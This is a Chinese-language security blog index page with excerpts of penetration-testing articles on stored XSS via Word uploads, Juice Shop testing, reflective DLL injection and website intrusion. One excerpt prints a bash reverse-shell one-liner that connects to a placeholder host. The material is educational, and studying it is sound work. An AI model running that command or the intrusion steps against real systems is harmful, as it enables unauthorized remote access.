登陆 注册
  • 上传Word文件形成存储型XSS路径

    桑云信息Lzers桑云信息Lzers 2018-06-10

    在渗透测试过程中,每当看到目标测试网站存在上传功能时,总会激起我的好奇心。如果能够走运的话,若目标网站服务器是PHP或ASP架构,而且上传功能没作后缀过滤,这样就能导致可以直接上传反弹脚本形成控制。如果这招行不通,我会尝试上传一个HTML页面去触发我自己设置的客户端javascript脚本形成XSS攻击。本文我就分享一个上传docx文件形成存储型XSS漏洞的...

  • 利用Burp Suite对OWASP Juice Shop进行渗透测试

    桑云信息Lzers桑云信息Lzers 2018-05-21

    1. 简介OWASP 的 在线果汁商店 (Juice Shop) 项目, 是一个很好的开源Web 靶场。它包含了OWASP的10大漏洞 [1], 并且这个项目用到了很多流行的技术如 HTML5, AngularJS, Bootstrap, Node.Js, SQLite等等,应用架构如下图所示:3. 安装 Burp Suite。本文需要用到Professio...

  • 复杂和变态的环境下jsp连接数据库

    桑云信息Lzers桑云信息Lzers 2018-05-15

    工具都有,命令不确定,正确执行姿势大家讨论下,或者补充一下工具和代码,1、jsp网站没有写入权限,有执行命令的时候,低权限,为了可以方便快速的读取文件。并且建立数据库连接可以使用小技巧在目标服务器上,搭建一个WEB服务。此WEB服务仅提供菜刀连接。然后将此WEB服务端口转发出来,工具互联网下载吧 。acat.jar 在园长的博客里。没有的话上github搜索...

  • 我的渗透测试之道

    桑云信息Lzers桑云信息Lzers 2018-05-14

    我做渗透测试也有一段时间了,服务了很多企事业单位,由于我所在的单位性质的关系,也接触到了很多其他公司接触不到的项目,从中也积累了很多的经验。渗透测试怎么做,我也想跟大家分享一下。在很多时候我们面对的总是不一样的客户,不一样的人,在客户关系的处理上我也有我自己的一些方法的。我们在项目开始做之前,会询问客户的要求,会把一些项目中可能出现的问题,会提前告诉客户,以...

  • DLL注入新姿势:反射式DLL注入研究

    桑云信息Lzers桑云信息Lzers 2018-05-12

    在分析koadic渗透利器时,发现它有一个注入模块,其DLL注入实现方式和一般的注入方式不一样。搜索了一下发现是由HarmanySecurity的Stephen Fewer提出的ReflectiveDLL Injection. 由于目前互联网上有关这个反射式DLL注入的分析并不多,也没有人分析其核心的ReflectiveLoader具体是怎么实现的,因此我就...

  • 网络安全渗透测试

    桑云信息Lzers桑云信息Lzers 2018-05-12

    针对网络的渗透测试项目一般包括:信息收集、端口扫描、指纹识别、漏洞扫描、绘制网络拓扑、识别代理、记录结果等。下面就一一介绍。信息收集DNSdns信息包含(A, MX, NS, SRV, PTR, SOA, CNAME) 记录,了解不同记录的含义至关重要。A 记录列出特定主机名的 IP 地址。这是名称解析的重要记录。CNAME 标准名称 此记录指定标准主机名的...

  • 渗透过程中的端口反弹

    桑云信息Lzers桑云信息Lzers 2018-05-11

    反弹的各种姿势。bash版本:[sourcecode language="plain"]bash -i >& /dev/tcp/10.0.0.1/8080 0>&1[/sourcecode]注意这个是由解析shell的bash完成,所以某些情况下不支持perl版本:[source...

  • 渗透指定站点笔记

    桑云信息Lzers桑云信息Lzers 2018-04-08

    首先,观察指定网站。入侵指定网站是需要条件的:要先观察这个网站是动态还是静态的。首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 如果是静态的(.htm或html),一般是不会成功的。如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。 Quote: 以下是入侵网站常用方法:1、...

请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net